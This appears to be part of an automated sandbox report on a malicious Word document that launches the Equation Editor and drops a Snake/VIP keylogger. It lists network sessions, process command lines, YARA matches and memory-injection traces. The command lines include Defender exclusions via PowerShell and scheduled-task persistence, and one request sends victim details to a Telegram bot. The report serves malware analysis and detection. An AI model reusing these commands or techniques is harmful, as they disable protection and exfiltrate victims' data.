                                              24 | 192.168.2.22 | 49198 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:49 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:50 UTC | 702 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52962
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSrH6UDBFGVfK8t209KHi4eranLMcdc5sHzJAP6nePHjBaGwSJIrf4J1ZutNrnMiqNXX9WPutP5y88xDCIajrZ4ouXOqjBiiMNu7W4%2FeOorNn0tDXKncql3tq02XpwrPdeiWUwJJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794375fcb0ca0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:50 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.2.22 | 49200 | 188.114.96.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:52 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:52 UTC | 712 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52965
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BJNaFU6EgRFSXHj%2B4qAYOuGr%2FEuNrE4%2F5rMkOs73ov2qYm0YhLl2jmDuWcDbC8qzb84wHWJRcPYvlweOV6D%2FfDa%2B9Vo5HBKi66awTsXPAdfQNUO0MWHZYhAQyPYnVMC7tTwOPfgd"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794459fc8c47f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:52 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.2.22 | 49202 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:53 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:53 UTC | 706 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:53 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52966
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aB3zpvJ%2FvdHyvi3XsYlyByJVkLeTqLzDDmKs0fMUHrGZ2VBf3t4qrNdj2bsU1CvvStQOFbIIS%2F70szXjP3xaUkWcsjFaPL4AWpK2dZvYCKi%2BhWya7bupAN1H2kPcQvftxGiBUzIc"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97944d0cff0f7f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:53 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.2.22 | 49203 | 149.154.167.220 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:54 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:54 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Fri, 26 Jul 2024 21:45:54 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-26 21:45:54 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                              Target ID:0
                                              Start time:17:45:00
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13fa30000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:17:45:18
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:17:45:20
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:17:45:21
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0xff0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:17:45:22
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0xff0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:17:45:23
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                                              Imagebase:0x430000
                                              File size:179'712 bytes
                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:19
                                              Start time:17:45:24
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:20
                                              Start time:17:45:25
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\swagodi78811.scr"
                                              Imagebase:0x8d0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:21
                                              Start time:17:45:25
                                              Start date:26/07/2024
                                              Path:C:\Windows\System32\taskeng.exe
                                              Wow64 process (32bit):false
                                              Commandline:taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                              Imagebase:0xff6a0000
                                              File size:464'384 bytes
                                              MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:22
                                              Start time:17:45:26
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Imagebase:0xaa0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:23
                                              Start time:17:45:30
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0x11c0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:25
                                              Start time:17:45:30
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0x11c0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:27
                                              Start time:17:45:31
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                                              Imagebase:0x160000
                                              File size:179'712 bytes
                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:29
                                              Start time:17:45:34
                                              Start date:26/07/2024
                                              Path:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\gRpkBp.exe"
                                              Imagebase:0xaa0000
                                              File size:683'016 bytes
                                              MD5 hash:C448536AEEA36B80A15D639E31C7B847
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false


                                                Execution Graph

                                                Execution Coverage:17.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:83
                                                Total number of Limit Nodes:1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Ppp
                                                • API String ID: 0-99483665
                                                • Opcode ID: 250564efd27ffba731edd5c8da14d1ed7d82569e709a80f70a67e05a9a0221d1
                                                • Instruction ID: cec53097fbb3f1e474cb1df6ed44c52e37422f05f057d13aeb67c4a2f98734de
                                                • Opcode Fuzzy Hash: 250564efd27ffba731edd5c8da14d1ed7d82569e709a80f70a67e05a9a0221d1
                                                • Instruction Fuzzy Hash: 03C2D634A11219CFCB64DF64C894AD9B7B2FF8A300F5185E9E409AB365DB30AE95CF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e12064e865ebf0d6cd2a11175699909206196569096325c8168a2783b654ac15
                                                • Instruction ID: 80d694ac46ea1370f6f07ad8c528890d7f0fe6aea9c0b2778d59967941656eb0
                                                • Opcode Fuzzy Hash: e12064e865ebf0d6cd2a11175699909206196569096325c8168a2783b654ac15
                                                • Instruction Fuzzy Hash: F22106B4D156188BEB18DF9BC8443EEFAF6AFC9300F14C06AD409762A4DBB409958F90
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 635797ed0d83a7b0ea51ec27a84eb8934cd4fec48a9f4a07349ae09cc84bb152
                                                • Instruction ID: ff8e1d502ba9d389270e161f4ef1a42d28ecb651dfc490a50cdfa06ae15df2b0
                                                • Opcode Fuzzy Hash: 635797ed0d83a7b0ea51ec27a84eb8934cd4fec48a9f4a07349ae09cc84bb152
                                                • Instruction Fuzzy Hash: 4EA00284F9F464D180402D142B410B7C1BC131F314EE13923990A334634598C052655E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0028EB7F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: l0e$l0e$l0e
                                                • API String ID: 963392458-2815422308
                                                • Opcode ID: 8defbb5e72c29bad7815eda4acd677fb91db34f6f4f6d17fab4c568b32a72f9f
                                                • Instruction ID: e0cad89dfc7016fe901b3fd3802149bc03820157ce8d7fcaa01f6be70dd816e8
                                                • Opcode Fuzzy Hash: 8defbb5e72c29bad7815eda4acd677fb91db34f6f4f6d17fab4c568b32a72f9f
                                                • Instruction Fuzzy Hash: 5EC14B74D112698FDF24DFA8C841BEDBBB1BF09300F0091AAD819B7290DB749A95CF95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0028EB7F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: l0e$l0e$l0e
                                                • API String ID: 963392458-2815422308
                                                • Opcode ID: b5d469a95fbf778ce1512ecc121edad2d14368e4fb0a75c68c7efcd7ed209ed2
                                                • Instruction ID: 6802adc0b839c4118069c00983d3e944646e1cb7e0501b2f1dd8b94083114d71
                                                • Opcode Fuzzy Hash: b5d469a95fbf778ce1512ecc121edad2d14368e4fb0a75c68c7efcd7ed209ed2
                                                • Instruction Fuzzy Hash: C1C14A74D112298FDF24DFA8C841BEDBBB1BF09300F0091AAD819B7290DB749A95CF95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 420b12-420c44 call 420fa8 189 420c47 call 4210ba 171->189 190 420c47 call 4210c8 171->190 187 420c4d-420c50 188 420c59 187->188 189->187 190->187
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4ze$4ze$4ze$`~e
                                                • API String ID: 0-4279224308
                                                • Opcode ID: 57f1469233f19f6ea6438d525ce7d732bad28e87969f2f5b9bfa2c993fa3830c
                                                • Instruction ID: 519b331a93b36dff699000822ddd60ea36507538e78da1afd08284bac0b75f74
                                                • Opcode Fuzzy Hash: 57f1469233f19f6ea6438d525ce7d732bad28e87969f2f5b9bfa2c993fa3830c
                                                • Instruction Fuzzy Hash: 7D31B474E013099FDB05DFA0D855AAEBBB3EF89301F205129D80967395CA315E42CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 253 420b22-420b3e call 420ea8 256 420cfc-420d0c call 420ee8 253->256
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4ze$`~e
                                                • API String ID: 0-3519593027
                                                • Opcode ID: 4948a9101572af8936159aec2e0ececee9a3067dd91288aa923f762dc1575bf6
                                                • Instruction ID: 61d7098226e2129b6b35d35d44932d4bbf70c88b0d94506083921116e4c28287
                                                • Opcode Fuzzy Hash: 4948a9101572af8936159aec2e0ececee9a3067dd91288aa923f762dc1575bf6
                                                • Instruction Fuzzy Hash: 73116D78E052199FCB04DFE4E9948ACBBB6FB49301F20512AE80AAB355D7305946CF01

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 28e519-28e58b 540 28e58d-28e59f 538->540 541 28e5a2-28e609 WriteProcessMemory 538->541 540->541 543 28e60b-28e611 541->543 544 28e612-28e664 541->544 543->544
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E5F3
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 576e014e48be72846b979f64a1535304255779ac0f79dbf60040733bbcf2338e
                                                • Instruction ID: 51ce354a0d596b994d182619dced207377513c5b8ddcd39f3ed458955e45d7a5
                                                • Opcode Fuzzy Hash: 576e014e48be72846b979f64a1535304255779ac0f79dbf60040733bbcf2338e
                                                • Instruction Fuzzy Hash: 8941B9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7250D338AA55CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 549 28e520-28e58b 551 28e58d-28e59f 549->551 552 28e5a2-28e609 WriteProcessMemory 549->552 551->552 554 28e60b-28e611 552->554 555 28e612-28e664 552->555 554->555
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E5F3
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 07e8fe25a7b3e7a609e29b2059aea4c28ccdc888094e1a7fae5d90173286773d
                                                • Instruction ID: 54ebf885dfeb98fe7dc14b5eea7686c496c0f624a6e2d579d11e1a27770ac525
                                                • Opcode Fuzzy Hash: 07e8fe25a7b3e7a609e29b2059aea4c28ccdc888094e1a7fae5d90173286773d
                                                • Instruction Fuzzy Hash: 9C41AAB4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D338AA55CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 28e678-28e748 ReadProcessMemory 563 28e74a-28e750 560->563 564 28e751-28e7a3 560->564 563->564
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E732
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: a13aa85031de22252da7d12d185956d6bb771a40e344362d6777953452d85474
                                                • Instruction ID: 246652e4b7c8769cfe7bb48b34b338a9ab2783f783e1d2642b73664b7ca25476
                                                • Opcode Fuzzy Hash: a13aa85031de22252da7d12d185956d6bb771a40e344362d6777953452d85474
                                                • Instruction Fuzzy Hash: 5941C8B8D042589FCF10CFA9D884AEEFBB1BF49310F24942AE815B7250C735A956CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 569 28e680-28e748 ReadProcessMemory 572 28e74a-28e750 569->572 573 28e751-28e7a3 569->573 572->573
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0028E732
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 1b08db192c1d4822b5f9ae115c0fd3f40b9ff9ee9f7e92ec2f5d99c4dadb8728
                                                • Instruction ID: 9a735fac56998daa167f88477f5fe654bc7509825ebfa46c2ccdaad87f173338
                                                • Opcode Fuzzy Hash: 1b08db192c1d4822b5f9ae115c0fd3f40b9ff9ee9f7e92ec2f5d99c4dadb8728
                                                • Instruction Fuzzy Hash: 8441C9B8D002589FCF10CFAAD884AEEFBB1BF49310F24942AE814B7240D734A955CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 578 28e3f1-28e4b8 VirtualAllocEx 581 28e4ba-28e4c0 578->581 582 28e4c1-28e50b 578->582 581->582
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0028E4A2
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 356144a510429e567edbcbfe14fc8c6ba0cd87d283f968bb6e8a42a26deaad4f
                                                • Instruction ID: 79da57e29d65eaa528ee4e28547f32717026e82586851e840306a3c13a883fef
                                                • Opcode Fuzzy Hash: 356144a510429e567edbcbfe14fc8c6ba0cd87d283f968bb6e8a42a26deaad4f
                                                • Instruction Fuzzy Hash: C041AAB9D002589FCF10CFA9D984AEEFBB1BF49310F10941AE815BB250D735A915CFA5
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0028E4A2
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
